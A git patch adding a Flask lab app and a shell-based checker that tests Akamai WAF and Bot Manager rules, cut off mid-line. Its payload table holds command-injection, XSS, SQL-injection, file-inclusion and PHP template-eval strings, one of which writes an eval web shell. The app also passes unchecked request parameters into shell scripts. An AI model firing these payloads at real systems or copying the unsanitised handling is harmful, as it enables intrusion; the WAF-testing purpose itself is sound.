From e0a4535e49e41d5ed8c2b9768e7c4b63cfb3fa8c Mon Sep 17 00:00:00 2001 From: Sangmin Kim Date: Tue, 19 Mar 2024 21:59:18 +0900 Subject: [PATCH] flask --- app/.DS_Store | Bin 6148 -> 6148 bytes app/flask/.DS_Store | Bin 0 -> 6148 bytes app/flask/app.py | 69 ++++ app/flask/scripts/bm.conf | 13 + app/flask/scripts/generate.sh | 10 + app/flask/scripts/mychecker.sh | 555 ++++++++++++++++++++++++++++++ app/flask/scripts/replaceImage.sh | 15 + app/flask/scripts/replaceVideo.sh | 15 + app/flask/templates/bm.html | 79 +++++ app/flask/templates/ivm.html | 241 +++++++++++++ 10 files changed, 997 insertions(+) create mode 100644 app/flask/.DS_Store create mode 100644 app/flask/app.py create mode 100644 app/flask/scripts/bm.conf create mode 100644 app/flask/scripts/generate.sh create mode 100644 app/flask/scripts/mychecker.sh create mode 100644 app/flask/scripts/replaceImage.sh create mode 100644 app/flask/scripts/replaceVideo.sh create mode 100644 app/flask/templates/bm.html create mode 100644 app/flask/templates/ivm.html diff --git a/app/.DS_Store b/app/.DS_Store index 219c73ffb0169abc412ad2c4a47650efacc9f5fe..886c4e92391d9c2f7a48099bb3ad6f8ce1bea115 100644 GIT binary patch delta 64 zcmZoMXfc@JFT%pWz`)4BAi%(ool=~fla!yI!#FWfLjoku%8FY@6F-P=X6N|J4*-X82`c~q diff --git a/app/flask/.DS_Store b/app/flask/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..b19deb3ae39a413a90d2388585b5100e9a4a4ec8 GIT binary patch literal 6148 zcmeHKyG{c^3>-rw649ij++W}iPEqm&`~Z+pARP+gLVq2<&G-RIbV*Br#*#g|UfZjk z;(P{RtIyp%ummutI^xUCRQ%j^B3I>cw5aip1BTtO?VtCP=<^QGy}^JjKJbd8{C)2U z3l@CA8xMLs#k$Jp@%ftaiUBbo2E>3E5CfMPV9$1$-zLh60Wly3ei`uZL!&x&g=1oT zI%r}9AkOFx;W}msVsi(vD;yK)p;)F8Gu3LuuuP}FRa{p%CT2P;Zf2dj*=j#u@O!a lt(X|Cm>X}!cSmu}*F5hE$HYjdKhlZ%5pZ54V&E?r_y(i~94Y_+ literal 0 HcmV?d00001 diff --git a/app/flask/app.py b/app/flask/app.py new file mode 100644 index 0000000..9d47bb8 --- /dev/null +++ b/app/flask/app.py @@ -0,0 +1,69 @@ +# This is the Flask app.py file that runs a web server and returns "Hello World" +from flask import Flask, request, render_template +import subprocess +app = Flask(__name__) + +doc_root = '/root/origin-33/flask/scripts' + +@app.route('/lab/bm',methods = ['GET']) +def bm(): + return render_template('bm.html') + +@app.route('/lab/ivm',methods = ['GET']) +def ivm(): + return render_template('ivm.html') + +@app.route('/lab/bm/run',methods = ['GET']) +def bm_run(): + property = request.args.get('property') + property = str(property) + print(property) + script = f'{doc_root}/mychecker.sh' + args = ['-c', f'{doc_root}/bm.conf', property] + output = subprocess.check_output ([script] + args, shell=False) + output = output.decode('utf-8') + print (output) + output = output.splitlines() + return output + +@app.route('/lab/ivm/generate',methods = ['GET']) +def ivm_generate_image(): + property = request.args.get('property') + property = str(property) + print(property) + script = f"{doc_root}/generate.sh" + args = [property] + output = subprocess.check_output ([script] + args, shell=False) + output = output.decode('utf-8') + print (output) + output = output.splitlines() + return output + +@app.route('/lab/ivm/replace_image',methods = ['GET']) +def ivm_replace_image(): + property = request.args.get('property') + property = str(property) + print(property) + script = f"{doc_root}/replaceImage.sh" + args = [property] + output = subprocess.check_output ([script] + args, shell=False) + output = output.decode('utf-8') + print (output) + output = output.splitlines() + return output + +@app.route('/lab/ivm/replace_video',methods = ['GET']) +def ivm_replace_video(): + property = request.args.get('property') + property = str(property) + print(property) + script = f"{doc_root}/replaceVideo.sh" + args = [property] + output = subprocess.check_output ([script] + args, shell=False) + output = output.decode('utf-8') + print (output) + output = output.splitlines() + return output + +if __name__ == '__main__': + app.run() diff --git a/app/flask/scripts/bm.conf b/app/flask/scripts/bm.conf new file mode 100644 index 0000000..291b83b --- /dev/null +++ b/app/flask/scripts/bm.conf @@ -0,0 +1,13 @@ +#! /bin/bash +# +# For information about the configuration options use: +# ./checker.sh -m +# +# Format example: +# bms p GET https://www.akamai.com / krs-cmd +bms s GET http://$1.akamai-lab.com / aka-arb +bms s GET http://$1.akamai-lab.com / aka-seo +bms s GET http://$1.akamai-lab.com / aka-eco +bms s GET http://$1.akamai-lab.com / tra-ikb +bms s GET http://$1.akamai-lab.com / tra-hbt +bms s GET http://$1.akamai-lab.com / act-cok diff --git a/app/flask/scripts/generate.sh b/app/flask/scripts/generate.sh new file mode 100644 index 0000000..efb846c --- /dev/null +++ b/app/flask/scripts/generate.sh @@ -0,0 +1,10 @@ +#! /bin/bash + +cd /usr/share/nginx/html/learn +cp cream.png.bak $1_dog.png +echo cream > $1_dog.txt +echo $1'_newDog: cream' + +cp globe.mp4.bak $1_video.mp4 +echo globe > $1_video.txt +echo $1'_newVideo: globe' \ No newline at end of file diff --git a/app/flask/scripts/mychecker.sh b/app/flask/scripts/mychecker.sh new file mode 100644 index 0000000..775e83d --- /dev/null +++ b/app/flask/scripts/mychecker.sh @@ -0,0 +1,555 @@ +#! /bin/bash +function logo() +{ + echo " _ _ " + echo " | | | | " + echo " ___| |__ ___ ___| | _____ _ __ " + echo " / __| '_ \ / _ \/ __| |/ / _ \ '__|" + echo "| (__| | | | __/ (__| < __/ | " + echo " \___|_| |_|\___|\___|_|\_\___|_| v1.0" + echo "" +} +function help() +{ + logo + echo "Welcome! This script aims to ease the testing of WAF Application Controls, Bot Manager Standard and Bot Manager Premier" + echo "Please check the information below in order to configure the proper parameters." + echo + echo "checker.sh -c [] -r [] -v -e -d -m" + echo "" + echo "-c Configuration file. Check default.conf inside 'conf' folder for more information or use the -m option" + echo "" + echo "Optional:" + echo "-r Identifier added to the referer header to filter in WSA." + echo "-v Verbose mode." + echo "-e Export results to a CSV file." + echo "-d Use DNS lookup instead of hard-coded Edge IPs (use with caution, resolvers could block your IP if too much tests)." + echo "-m Print manual." + echo "" +} +function helpconf() +{ + logo + echo "This script reads a configuration file that uses the following 6 block of data per line:" + echo "" + echo "[type] [environment] [method] [URL] [path] [arguments(optional)]" + echo "" + echo "Examples:" + echo "atg p GET http://www.{akamaized domain}.com / krs-cmd" + echo "bms s GET http://www.{akamaized domain}.com / aka-arb" + echo "bmp p POST http://www.{akamaized domain}.com / foo=bar" + echo "man s GET http://www.{akamaized domain}.com /?foo=bar" + echo "man p POST http://www.{akamaized domain}.com / foo=bar" + echo "" + echo "Available options:" + echo "--------------------------------------------------------------------------------------" + echo "type The type of control that will be tested, options are:" + echo " atg -- WAF Attack Groups" + echo " bms -- Bot Manager Standard" + echo " bmp -- Bot Manager Premier" + echo " man -- Manual test" + echo "environment Destination of the request to be generated, options are:" + echo " s -- Staging environment" + echo " p -- Production environment" + echo "method Method expected on Akamai for the tested URL, options are: GET or POST" + echo "url URL to test, the protocol (http or https) needs to be used" + echo "path Path to test (use / if no specific path)" + echo "arguments For atg:" + echo " krs-cmd -- Command Injection" + echo " krs-xss -- Cross-Site Scripting" + echo " krs-dos -- DDOS" + echo " krs-iht -- Invalid HTTP" + echo " krs-php -- PHP Injection" + echo " krs-rfi -- Remote File Inclusion" + echo " krs-sql -- SQL Injection" + echo " krs-trj -- Trojan" + echo " aag-wat -- Web Attack Tool" + echo " aag-wpr -- Web Protocol Attack" + echo " aag-sql -- SQL Injection" + echo " aag-xss -- Cross-Site Scripting" + echo " aag-lfi -- Local File Inclusion" + echo " aag-rfi -- Remote File Inclusion" + echo " aag-cmi -- Command Injection" + echo " aag-wpl -- Web Platform Attack" + echo " penalty -- Penalty test (no attack)" + echo " For bms:" + echo " aka-arb -- Academic or Research Bots" + echo " aka-asc -- Automated Shopping Cart and Sniper Bots" + echo " aka-bib -- Business Intelligence Bots" + echo " aka-eco -- E-Commerce Search Engine Bots" + echo " aka-eag -- Enterprise Data Aggregator Bots" + echo " aka-fia -- Financial Account Aggregator Bots" + echo " aka-fis -- Financial Services Bots" + echo " aka-job -- Job Search Engine Bots" + echo " aka-mda -- Media or Entertainment Search Bots" + echo " aka-new -- News Aggregator Bots" + echo " aka-onl -- Online Advertising Bots" + echo " aka-rss -- RSS Feed Reader Bots" + echo " aka-seo -- SEO, Analytics or Marketing Bots" + echo " aka-sit -- Site Monitoring and Web Development Bots" + echo " aka-soc -- Social Media or Blog Bots" + echo " aka-war -- Web Archiver Bots" + echo " aka-wse -- Web Search Engine Bots" + echo " tra-ikb -- Impersonators of Known Bots" + echo " tra-dvf -- Development Frameworks" + echo " tra-htl -- HTTP Libraries" + echo " tra-wsl -- Web Services Libraries" + echo " tra-osc -- Open Source Crawlers/Scraping Platforms" + echo " tra-hbt -- Headless Browsers/Automation Tools" + echo " tra-dcb -- Declared Bots (Keyword Match)" + echo " tra-agc -- Aggressive Web Crawlers" + echo " tra-req -- Request Anomaly" + echo " act-cok -- Cookie Integrity Failed" + echo " For bmp:" + echo " List of body parameters used by the endpoint (if any)" + echo " For man:" + echo " If using POST, list of body parameters" +} +function readconfig +{ + if [ $verbose -eq 1 ]; then echo -e "> reading configuration"; fi + while IFS=' ' read -ra line || [ -n "$line" ]; + do + [[ "$line" =~ ^(#.*|^$)$ ]] && continue + for i in "${line[@]}"; do + test_string+=("$i") + done + if [ $verbose -eq 1 ]; then echo -e "> ${test_string[0]} ${test_string[1]} ${test_string[2]} ${test_string[3]} ${test_string[4]} ${test_string[5]}"; fi + test_string[3]='http://'$property'.akamai-lab.com' + # echo $test_string[3] + protocol="" + sleepsec=5 + if [[ ${test_string[3]} =~ ^http:// ]]; + then + host=${test_string[3]:7}; + protocol=${test_string[3]:0:4}; + fi + if [[ ${test_string[3]} =~ ^https:// ]]; + then + host=${test_string[3]:8}; + protocol=${test_string[3]:0:5}; + fi + + if [[ $host == '' ]]; then + echo "Oops... did't find any valid protocol." + exit + fi + env="" + if [[ ${test_string[1]} == 'p' ]]; then + env="Production" + if [[ $protocol == 'http' ]]; then resolve 1; fi + if [[ $protocol == 'https' ]]; then resolve 2; fi + elif [[ ${test_string[1]} == 's' ]]; then + env="Staging" + if [[ $protocol == 'http' ]]; then resolve 3; fi + if [[ $protocol == 'https' ]]; then resolve 4; fi + else + echo "Oops... not a valid environment." + exit + fi + test_string=() + if [ $verbose -eq 1 ]; then echo -e "> sleeping for 5 seconds..."; fi + sleep $sleepsec + done < "$filecnf" +} +function resolve() +{ + xpass=0 + if [[ $1 == 1 ]]; then + if [[ $PFIP == '' ]]; then + dig="dig +short $PFFQ | tail -n1" + PFIPi=$(eval $dig) + if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PFIPi]"; fi + else + if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi + if [[ $xpass == 1 ]]; then + iparray=(${PFIP//:/ }) + PFIPi="${iparray[$RANDOM % ${#iparray[@]}]}" + fi + if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PFIPi]"; fi + fi + curl $PFIPi + elif [[ $1 == 2 ]]; then + if [[ $PEIP == '' ]]; then + dig="dig +short $PEFQ | tail -n1" + PEIPi=$(eval $dig) + if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PEIPi]"; fi + else + if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi + if [[ $xpass == 1 ]]; then + iparray=(${PEIP//:/ }) + PEIPi="${iparray[$RANDOM % ${#iparray[@]}]}" + fi + if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PEIPi]"; fi + fi + curl $PEIPi + elif [[ $1 == 3 ]]; then + if [[ $SFIP == '' ]]; then + dig="dig +short $SFFQ | tail -n1" + SFIPi=$(eval $dig) + if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SFIPi]"; fi + else + if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi + if [[ $xpass == 1 ]]; then + iparray=(${SFIP//:/ }) + SFIPi="${iparray[$RANDOM % ${#iparray[@]}]}" + fi + if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SFIPi]"; fi + fi + curl $SFIPi + elif [[ $1 == 4 ]]; then + if [[ $SEIP == '' ]]; then + dig="dig +short $SEFQ | tail -n1" + SEIPi=$(eval $dig) + if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SEIPi]"; fi + else + if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi + if [[ $xpass == 1 ]]; then + iparray=(${SEIP//:/ }) + SEIPi="${iparray[$RANDOM % ${#iparray[@]}]}" + fi + if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SEIPi]"; fi + fi + curl $SEIPi + fi +} +function exportcsv() +{ + if [ $verbose -eq 1 ]; then echo -e "> exporting .csv"; fi + export_payload="" + export_type="" + for i in ${!ACRONYMA[@]}; do + if [[ ${test_string[5]} == ${ACRONYMA[$i]} ]]; then export_payload=${ACRONYMB[$i]}; fi + if [[ ${test_string[0]} == ${ACRONYMA[$i]} ]]; then export_type=${ACRONYMB[$i]}; fi + done + if [[ ${test_string[0]} == 'bmp' ]]; then export_payload=${test_string[5]}; fi + echo "${env},${http},${epoch},${refe},$export_type,$export_payload,${URL}" >> "$(basename ${filecnf})_${filetim}.csv" +} +function payload +{ + PARAMHOLDER="?id=1" + HEADERHOLDER1="" + HEADERHOLDER2="" + HEADERHOLDER3="" + rules=(${1//:/ }) + for i in ${!rules[@]}; do + case ${rules[$i]} in + "950002") PARAMHOLDER+="&p=powershell.exe"; ;; + "950006") PARAMHOLDER+="&p=chmod.40%2B1x.traceroute"; ;; + "950011") PARAMHOLDER+="&p=%3C%21--%23printenv"; ;; + "950103") HEADERHOLDER1+="p: ..%2F..%2F..%2F..%2F"; ;; + "950907") PARAMHOLDER+="&p=wget"; ;; + "3000005") PARAMHOLDER+="&p=%2Fsbin%2Fping"; ;; + "3000007") PARAMHOLDER+="&p=%3B+head+%2Fusr%2Ftemp+%3E+my.f"; ;; + "3000012") PARAMHOLDER+="&p=action%3Anew+java."; ;; + "3000013") PARAMHOLDER+="&p=wget+https%3A%2F%2Fmy.site"; ;; + "3000014") PARAMHOLDER+="&p=%24%7B.openstream()."; ;; + "3000020") PARAMHOLDER+="&p=%2Fproc%2Fself%2Fenviron"; ;; + "3000023") PARAMHOLDER+="&class%5B%27classLoader%27%5D%5B%27resources%27%5D%5B%27dirContext%27%5D%5B%27docBase%27%5D%3D%2F%2F192.168.18.1%2Ffile.do"; ;; + "3000025") PARAMHOLDER+="&p=()%20%7B.4654"; ;; + "3000031") HEADERHOLDER2+="Range: 18446744073709551615"; ;; + "3000033") PARAMHOLDER+="&p=phar%3A%2F%2F%20zlib%3A%2F%2F%20glob%3A%2F%2F%20expect%3A%2F%2F%20jar%3A%2F%2F"; ;; + "3000034") PARAMHOLDER+="&p=Runtime.getRuntime("; ;; + "3000041") PARAMHOLDER+="&p=%24class.inspect(%20type.getruntime(freemarker.template.utility.execute"; ;; + "3000056") PARAMHOLDER+="&p=o%3A5%3A%5C%22456%5C%22%3A546%3A%7Ba%3B%7D"; ;; + "3000058") PARAMHOLDER+="&p=action%3A%24%7B"; ;; + "3000065") H10="Content-Type: text/xml"; DATAHOLDER='%3Ccommand%3Ejava.lang.processbuilder$nullinputstream\ncom.sun.xml.internal.ws.encoding.xml.xmlmessage$xmldatasource\njavax.crypto.cipherinputstream\njavax.crypto.nullcipher\n\njava.lang.processbuilder%24nullinputstream%5Cn%0Dcom.sun.xml.internal.ws.encoding.xml.xmlmessage%24xmldatasource%5Cn%0Djavax.crypto.cipherinputstream%5Cn%0Djavax.crypto.nullcipher%5Cn%0D%3Cclassfactory%3E'; ;; + "3000068") PARAMHOLDER+="&p=%3Cesi%3Ainclude"; ;; + "3000072") H10="Content-Type: application/octet-stream"; DATAHOLDER='*.exec(* *burpcollaborator* *ysoserial* *freddy?*http:*.20java.%2Fio%2Ffile%20java%2Flang%2Fruntime.123'; ;; + "950018") PARAMHOLDER+="&p=http%3A%2F%2Fwww.test.com%2Ftest.pdf%20x0d%23"; ;; + "958000") PARAMHOLDER+="&p=.addimport"; ;; + "958001") PARAMHOLDER+="&p=document.exitFullscreen%5D"; ;; + "958002") PARAMHOLDER+="&p=.execscript"; ;; + "958003") PARAMHOLDER+="&p=.fromcharcode"; ;; + "958004") PARAMHOLDER+="&p=.innerhtml"; ;; + "958005") PARAMHOLDER+="&p=%3C!%5Bcdata%5B"; ;; + "958006") PARAMHOLDER+="&p=%3Cbody%20background"; ;; + "958007") PARAMHOLDER+="&p=%3Cbody%20onload"; ;; + "958008") PARAMHOLDER+="&p=%3Cinput%20type%20image"; ;; + "958009") PARAMHOLDER+="&p=%40import"; ;; + "958010") PARAMHOLDER+="&p=activexobject"; ;; + "958011") PARAMHOLDER+="&p=background-image%3A"; ;; + "958012") PARAMHOLDER+="&p=copyparentfolder"; ;; + "958013") PARAMHOLDER+="&p=createtextrange"; ;; + "958016") PARAMHOLDER+="&p=getparentfolder"; ;; + "958017") PARAMHOLDER+="&p=getspecialfolder"; ;; + "958018") PARAMHOLDER+="&p=href%20javascript%3A"; ;; + "958019") PARAMHOLDER+="&p=href%20shell%3A"; ;; + "958020") PARAMHOLDER+="&p=href%20vbscript%3A"; ;; + "958022") PARAMHOLDER+="&p=livescript%3A"; ;; + "958023") PARAMHOLDER+="&p=lowsrc%20javascript%3A"; ;; + "958024") PARAMHOLDER+="&p=lowsrc%20shell%3A"; ;; + "958025") PARAMHOLDER+="&p=lowsrc%20vbscript%3A"; ;; + "958026") PARAMHOLDER+="&p=mocha%3A"; ;; + "958027") PARAMHOLDER+="&p=onabort"; ;; + "958028") PARAMHOLDER+="&p=settimeout%20("; ;; + "958030") PARAMHOLDER+="&p=src%20http%3A"; ;; + "958031") PARAMHOLDER+="&p=src%20javascript%3A"; ;; + "958032") PARAMHOLDER+="&p=src%20shell%3A"; ;; + "958033") PARAMHOLDER+="&p=src%20vbscript%3A"; ;; + "958034") PARAMHOLDER+="&p=style%3Dbexpression("; ;; + "958036") PARAMHOLDER+="&p=type%20application%20x-javascript"; ;; + "958037") PARAMHOLDER+="&p=type%20application%20x-vbscript"; ;; + "958038") PARAMHOLDER+="&p=type%20text%20ecmascript"; ;; + "958039") PARAMHOLDER+="&p=type%20text%20javascript"; ;; + "958040") PARAMHOLDER+="&p=type%20text%20jscript"; ;; + "958041") PARAMHOLDER+="&p=type%20text%20vbscript"; ;; + "958045") PARAMHOLDER+="&p=url%20javascript%3A"; ;; + "958046") PARAMHOLDER+="&p=url%20shell%3A"; ;; + "958047") PARAMHOLDER+="&p=url%20vbscript%3A"; ;; + "3000036") PARAMHOLDER+="&foo&msg=bar"; ;; + "950116") PARAMHOLDER="%ufF12/"; ;; + "950107") PARAMHOLDER="%00%!%u1234/?id=1"; ;; + "950108") H10="Content-Type: application/x-www-form-urlencoded;charset=test"; DATAHOLDER='%00%!%u1234/'; ;; + "950109") PARAMHOLDER+="&p=%2500%25!%25u1234"; ;; + "958230") HEADERHOLDER1="Range: 50-10 bytes=10-,10-,10-,10-,10-,"; ;; + "958231") HEADERHOLDER1="Range: bytes=10-,10-,10-,10-,10-,"; ;; + "958291") HEADERHOLDER1="Range: bytes=0-"; ;; + "958295") HEADERHOLDER1="Connection: keep-alive,close"; ;; + "960006") H9="User-Agent;"; ;; + "960007") H6="Host;"; ;; + "960008") H6="Host:"; ;; + "960009") H9="User-Agent:"; ;; + "960010") HEADERHOLDER1="Content-Type: application/x-www-checker"; ;; + "960011") HEADERHOLDER2="Content-Length: 1000"; ;; + "960012") HEADERHOLDER2="Content-Length:"; ;; + "960016") HEADERHOLDER2="Content-Length: checker"; ;; + "960022") HEADERHOLDER1="Expect: 100-continue"; PROTOCOLHOLDER="--http1.0"; ;; + "960034") PROTOCOLHOLDER="--httpX.X"; ;; + "960038") HEADERHOLDER1="Content-Range: test"; ;; + "960901") PARAMHOLDER+="&one=more"; ;; + "960902") HEADERHOLDER3="Content-Encoding: Identity"; ;; + "958976") PARAMHOLDER+="¤t={pboot:if(eval\($_GET\['a'\]))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd4YiddKTsgPz54YnNoZWxs'));"; ;; + "958977") PARAMHOLDER+="&p=allow_url_include%3D%20safe_mode%3D%20suhosin.simulation%3D%20disable_functions%3D%20open_basedir%3D%20auto_prepend_file%3D%20php%3A%2F%2Finput"; ;; + "959151") PARAMHOLDER+="&p=%3C%3F%3C%3F"; ;; + "3000003") PARAMHOLDER+="&p=base64_decode("; ;; + "3000016") PARAMHOLDER+="&p=data%3Atext%2Fplain%3Bbase64%2C"; ;; + "950117") PARAMHOLDER+="&p=https%3A%2F%2F123.123.123.123"; ;; + "950118") PARAMHOLDER+="&p=mosConfig_absolute_path=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;; + "950119") PARAMHOLDER+="&p=https%3A%2F%2F${test_string[3]}%3F"; ;; + "950120") PARAMHOLDER+="&referer=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;; + "950001") PARAMHOLDER+="&p=dbms_java"; ;; + "950007") PARAMHOLDER+="&p=attnotnull"; ;; + "950901") PARAMHOLDER+="&p=%22test%3C%3D%3E%22test"; ;; + "950908") PARAMHOLDER+="&p=coalesce"; ;; + "959070") PARAMHOLDER+="&p=create%20table%27%20statements%20(e.g.%20%27create%20table%20("; ;; + "959071") PARAMHOLDER+="&p=%27%20OR%20%27string%27%20%3C"; ;; + "959072") PARAMHOLDER+="&p=AND%20%27string%27%3D"; ;; + "959073") PARAMHOLDER+="&p=select%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27by%27...%27having"; ;; + "981172") COOKIEHOLDER="p=%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27"; ;; + "950110") HEADERHOLDER1="x_file: test"; ;; + "950921") PARAMHOLDER="/scri%E2%80%8Cpts/root.exe&/c+dir"; ;; + "watatomic") PARAMHOLDER="/bbscan-404-existence-check?id=1&msg=legion"; UAHOLDER+=" absinthe"; HEADERHOLDER1="acunetix-aspect: 1"; HEADERHOLDER2="nstealth_xss: nstealth_xss"; ;; + "wpratomic") HEADERHOLDER1="Content-Type: application/xml"; HEADERHOLDER2=" Transfer-Encoding: checker"; HEADERHOLDER3="Content-Length: chunked"; ;; + "sqlatomic") PARAMHOLDER+="&fakeparam=-1%20UNION%20ALL%20SELECT%20%40%40version%2C2%2C3--"; ;; + "xssatomic") PARAMHOLDER+="&fakeparam=%3Cscript%3Ewindow.alert(%221213%22)%3C%2Fscript%3E&f2=PHNjcmlwdD5hbGVyd"; ;; + "lfiatomic") PARAMHOLDER+="&fakeparam=.././.././../etc/passwd"; ;; + "rfiatomic") PARAMHOLDER+="&fakeparam=http://cirt.net/rfiinc.txt"; ;; + "cmiatomic") PARAMHOLDER+="&fakeparam=something;/bin/whoami"; ;; + "wplatomic") HEADERHOLDER1+="Range: 18446744073709551615"; ;; + *) PARAMHOLDER="" ; ;; + esac + done +} +function curl +{ + shopt -s nocasematch + if [[ ${test_string[2]} =~ ^(GET|POST)?$ ]]; then + if [ $verbose -eq 1 ]; then echo -e "> using ${test_string[2]}"; fi + if ! [[ ${test_string[2]} =~ ^(GET)?$ ]]; then method="-X ${test_string[2]}"; else method=""; fi + COOKIEHOLDER="" + HEADERHOLDER1="Connection: keep-alive" + HEADERHOLDER2="" + PARAMHOLDER="" + PATHHOLDER="" + DATAHOLDER="{'foo':'bar'}" + UAHOLDER="" + PROTOCOLHOLDER="--http2" + if [ -z "$fileref" ]; then + epoch=$(date +%s); + else + epoch=$fileref; + fi + H1="Accept: application/json" + H2="Accept-Encoding: gzip;q=1.0, compress;q=0.5" + H3="Accept-Language: en-US,en;q=1.0" + H4="Cache-Control: no-cache" + H5="Cookie: foo=bar;" + H6="Host: $host" + H7="Origin: ${test_string[3]}" + H8="Referer: $epoch" + H9="User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 opr/checker" + H10="Content-Type: text/plain" + if [ ${test_string[0]} = 'atg' ]; then + if [ $verbose -eq 1 ]; then echo -e "> Attack Group (atg) found"; fi + case ${test_string[5]} in + "krs-cmd") payload "950002:950006:950011:950103:950907:3000005";; + "krs-xss") payload "950018:958000:958001:958002:958003:958004:958005:958006:958007:958008:958009:958010:958011:958012:958013:958016:958017:958018:958019:958020:958022:958023:958024:958025:958026:958027:958028:958030:958031:958032:958033:958034:958036:958037:958038:958039:958040:958041:958045:958046:958047"; ;; + "krs-dos") payload "3000036"; ;; + "krs-iht") payload "950107:950108:950109:958291:958295:960010:960016:960022:960038:960901:960902"; ;; + "krs-php") payload "958976:958977:959151:3000003:3000016"; ;; + "krs-rfi") payload "950117:950118:950119:950120"; ;; + "krs-sql") payload "950001:950007:950901:950908:959070:959071:959072:959073:981172"; ;; + "krs-trj") payload "950110:950921"; ;; + "aag-wat") payload "watatomic"; ;; + "aag-wpr") payload "wpratomic"; ;; + "aag-sql") payload "sqlatomic"; ;; + "aag-xss") payload "xssatomic"; ;; + "aag-lfi") payload "lfiatomic"; ;; + "aag-rfi") payload "rfiatomic"; ;; + "aag-cmi") payload "cmiatomic"; ;; + "aag-wpl") payload "wplatomic"; ;; + "penalty") payload ""; ;; + *) echo -e 'Oops... invalid argument!'; exit; ;; + esac + elif [ ${test_string[0]} = 'bms' ]; then + if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Standard (bms) found"; fi + case ${test_string[5]} in + "aka-arb") UAHOLDER+=" lightspeedsystems"; ;; + "aka-asc") HEADERHOLDER1+="X-HONEY-BOT:Hi_HC_Aegah4luquud8ahVOchood5a"; ;; + "aka-bib") UAHOLDER+=" companybooknetworking.com"; ;; + "aka-eco") HEADERHOLDER1="X-HONEY-BOT:Hi_PC_uNeini4aphaiB1oiChoh1thi"; ;; + "aka-eag") UAHOLDER+=" shrinktheweb.com"; ;; + "aka-fia") UAHOLDER+=" (moneyforward)"; HEADERHOLDER1="X-MF-Tag:12345678"; ;; + "aka-fis") UAHOLDER+=" drwholdings.com"; ;; + "aka-job") UAHOLDER+=" motorelavoro.it"; ;; + "aka-mda") UAHOLDER+=" localconditions.com"; ;; + "aka-new") UAHOLDER+=" reader.aol.com"; ;; + "aka-onl") UAHOLDER+=" integralads.com"; ;; + "aka-rss") UAHOLDER+=" pocketcasts.com"; ;; + "aka-seo") UAHOLDER+=" terrykyleseoagency.com"; ;; + "aka-sit") HEADERHOLDER1="X-Abuse-Info: New Relic Synthetics Monitor"; ;; + "aka-soc") UAHOLDER+=" socialrank.io"; ;; + "aka-war") UAHOLDER+=" europarchive.org"; ;; + "aka-wse") UAHOLDER+=" femtosearch.com"; ;; + "tra-ikb") UAHOLDER+=" amazon route 53"; ;; + "tra-dvf") UAHOLDER+=" ruby microsoft atl native"; ;; + "tra-htl") UAHOLDER+=" winhttprequest"; ;; + "tra-wsl") UAHOLDER+=" httpful"; ;; + "tra-osc") UAHOLDER+=" mercury.postlight.com"; ;; + "tra-hbt") UAHOLDER+=" prerender"; ;; + "tra-dcb") UAHOLDER+=" semantic"; ;; + "tra-agc") UAHOLDER+=" openhose.org"; ;; + "tra-req") HEADERHOLDER1="Accept-Language: en"; UAHOLDER+=" mozilla./"; ;; + "act-cok") COOKIEHOLDER="ak_bmsc=foobar; bm_mi=foobar"; ;; + *) echo -e 'Oops... invalid argument!'; exit; ;; + esac + elif [ ${test_string[0]} = 'bmp' ]; then + if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Premier (bmp) found"; fi + if [[ ${test_string[5]} != '' ]]; then + DATAHOLDER="${test_string[5]}" + fi + test_string[5]="BMP"; + elif [ ${test_string[0]} = 'man' ]; then + if [ $verbose -eq 1 ]; then echo -e "> Manual test found"; fi + if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then DATAHOLDER=${test_string[5]}; fi + test_string[5]="Manual"; + else + if [ $verbose -eq 1 ]; then echo -e "> No type found"; fi + fi + + description=""; + if [ ${test_string[5]} = 'aka-arb' ]; then + description="Academic or Research Bots" + elif [ ${test_string[5]} = 'aka-seo' ]; then + description="SEO, Analytics or Marketing Bots" + elif [ ${test_string[5]} = 'aka-eco' ]; then + description='E-Commerce Search Engine Bots' + elif [ ${test_string[5]} = 'tra-ikb' ]; then + description='Impersonators of Known Bots' + elif [ ${test_string[5]} = 'tra-hbt' ]; then + description='Headless Browsers/Automation Tools' + elif [ ${test_string[5]} = 'act-cok' ]; then + description='Cookie Integrity Failed' + else + description='not equal'; + fi + + export now=$(date) + echo -e "\t $now : [ $env ] [ $description ]" + H9+=${UAHOLDER} + H5+=${COOKIEHOLDER} + URL="${test_string[3]}${test_string[4]}${PARAMHOLDER}" + CURL='/usr/bin/curl' + CURLARGS="-i -k -s -S -v -m 30 $method $PROTOCOLHOLDER --connect-to ::$1" + echo -e "${test_string[3]}${test_string[4]}" + if [[ 